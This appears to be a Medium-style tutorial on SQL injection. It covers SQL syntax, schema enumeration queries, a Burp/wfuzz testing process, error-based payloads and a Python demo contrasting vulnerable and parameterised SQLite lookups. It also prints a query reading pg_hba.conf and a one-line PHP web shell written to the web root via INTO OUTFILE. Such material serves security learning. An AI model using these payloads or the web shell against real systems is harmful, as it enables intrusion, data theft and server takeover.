Behind the Hack: The Mechanics of SQL Injection Attacks

Hello smart hackers, welcome back to my new blog. I hope you all are well!!
In this blog, we are going to discuss SQL Injection Attacks.
Please read this article until the end.

SQL injection arises when user input is concatenated into a database query without proper sanitization or parameterization. The input then becomes part of the SQL text itself, which lets an attacker change the structure of the query instead of merely supplying a value.

By exploiting SQL injection flaws, hackers can extract confidential data, alter data, or write files to the host server, potentially gaining full control over it.

Let’s review some basic SQL syntax first:

-- SELECT statement to retrieve data from a table 
SELECT column1, column2, ... 
FROM tablename 
WHERE condition; 
 
-- INSERT statement to add data to a table 
INSERT INTO tablename (column1, column2, ...) 
VALUES (value1, value2, ...); 
 
-- UPDATE statement to modify existing data in a table 
UPDATE tablename 
SET column1 = value1, column2 = value2, ... 
WHERE condition; 
 
-- DELETE statement to remove data from a table 
DELETE FROM tablename 
WHERE condition; 
 
-- CREATE TABLE statement to create a new table 
CREATE TABLE tablename ( 
    column1 datatype, 
    column2 datatype, 
    ... 
); 
 
-- DROP TABLE statement to delete a table 
DROP TABLE tablename; 
 
-- ALTER TABLE statement to modify a table (e.g., add a column) 
ALTER TABLE tablename 
ADD columnname datatype; 
 
-- Basic JOIN operation to retrieve data from multiple tables 
SELECT column1, column2, ... 
FROM table1 
JOIN table2 
ON table1.column = table2.column 
WHERE condition;

Database Enumeration

  • Enumerating MySQL Databases

select version();
select current_user();
select table_schema from information_schema.tables group by table_schema;
select table_name from information_schema.tables where table_schema = 'app';
select column_name, data_type from information_schema.columns where table_schema = 'app' and table_name = 'menu';

  • Microsoft SQL Server-Specific Functions and Tables

select @@version;
SELECT SYSTEM_USER;
SELECT name FROM sys.databases;
select * from app.information_schema.tables;
select COLUMN_NAME, DATA_TYPE from app.information_schema.columns where TABLE_NAME = 'menu';

GO

  • PostgreSQL-Specific Functions and Tables

select version();
select current_user;
select datname from pg_database;
select table_name from app.information_schema.tables where table_schema = 'public';
select column_name, data_type from app.information_schema.columns where table_name = 'menu';

How to Find SQL Injection and Build a Payload

Process:

  1. Go through the website manually while proxying the requests through Burp Suite.
  2. Find all the input points that the target actually processes.
  3. Send the requests to Burp Intruder and fuzz the input points with SQL injection payloads.
  4. If the application errors out, read the error and build a payload around it.
  5. If there is no error, either there is no injection, or it is a blind SQL injection where the error is not shown.
  6. For blind SQL injection, use blind injection payloads to test it.
  7. Once you have crafted a working payload, exploit it to dump the database or achieve code execution.

Tools to use:

wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "id=FUZZ" -u http://<>

Once you confirm it, exploit it

Try to build a payload using one of the ways below: [1]

  1. Error-based — “Error-based injections are exploited by triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results or gain information on how to restructure the query for further exploitation”.
cast(@@version as integer) 
extractvalue('',concat('>',version())) 
to_char(dbms_xmlgen.getxml('select "'|| (select substr(banner,0,30) from v$version where rownum=1)||'" from sys.dual'))

2. Union-based — Union-based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The UNION operator can only be used if the original and injected queries have the same structure (the same number of columns with compatible data types). You can try to enumerate the number of columns using error-based enumeration.

3. Blind-based — “Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.”

4. Stacked Query based — “Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.” [2]

5. Misc

5.1 Read and Write [1]

SELECT * FROM mytable INTO dumpfile '/tmp/somefile' [MySQL]
SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200); [PostgreSQL]

5.2 Execute commands [1]

SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php'
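To make the root cause from the introduction and the union-based mechanism from item 2 concrete, here is an added example (not from the original post) in Python against an in-memory SQLite database: the lookup that splices input into the SQL text leaks table names through a UNION, the parameterised lookup returns nothing for the same input, and a UNION with the wrong column count is rejected by the database, which is exactly the error a column-count enumeration relies on. The menu and users tables, their rows and the inputs are all constructed for the example.

```python
import sqlite3

def make_db():
    # Constructed in-memory database so the example runs offline.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menu (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO menu VALUES (?, ?, ?)",
                     [(1, "coffee", 2.5), (2, "tea", 2.0)])
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, pwhash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash')")
    return conn

def lookup_vulnerable(conn, item_id):
    # User input is spliced straight into the query text: this is the flaw.
    sql = "SELECT id, name, price FROM menu WHERE id = " + item_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, item_id):
    # Parameterised query: the driver binds the value separately, so the
    # input can never alter the structure of the statement.
    sql = "SELECT id, name, price FROM menu WHERE id = ?"
    return conn.execute(sql, (item_id,)).fetchall()

NORMAL_INPUT = "1"
# Constructed union-based input: three columns to match the original SELECT.
# sqlite_master plays the role of information_schema.tables from the
# enumeration section above.
UNION_INPUT = "0 UNION SELECT 0, name, 0 FROM sqlite_master WHERE type='table'"
# Same idea with the wrong column count: the database refuses to run it.
BAD_COUNT_INPUT = "0 UNION SELECT name FROM sqlite_master"

def demo():
    conn = make_db()
    results = {
        "vuln_normal": lookup_vulnerable(conn, NORMAL_INPUT),
        "vuln_union": lookup_vulnerable(conn, UNION_INPUT),   # leaks table names
        "safe_normal": lookup_safe(conn, NORMAL_INPUT),       # still works
        "safe_union": lookup_safe(conn, UNION_INPUT),         # no rows
    }
    try:
        lookup_vulnerable(conn, BAD_COUNT_INPUT)
        results["bad_count_error"] = None
    except sqlite3.OperationalError as exc:
        # Column-count mismatch surfaces as a database error.
        results["bad_count_error"] = str(exc)
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```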

Automated Tool

We could run sqlmap to automate the attack, but it is more useful to explore a target manually before reaching for an automated tool. This prevents us from breaking the target or missing critical hidden injection points.

Source

Short cheat sheet:

  1. Blog
  2. Github

References:

  1. https://sqlwiki.netspi.com/injectionTypes/errorBased/#mysql
  2. https://www.sqlinjection.net/stacked-queries/
  3. https://medium.com/hacker-toolbelt/sqlmap-cheat-sheet-e5a38300b50
  4. https://gist.github.com/ingramali/af16d31eace1f90574147cbc94e9e965

I have a small request for all of you: I regularly write articles on many security topics, so if you haven’t already, follow me and clap for this article, because that gives me the motivation to write something new!!

Thank you !!!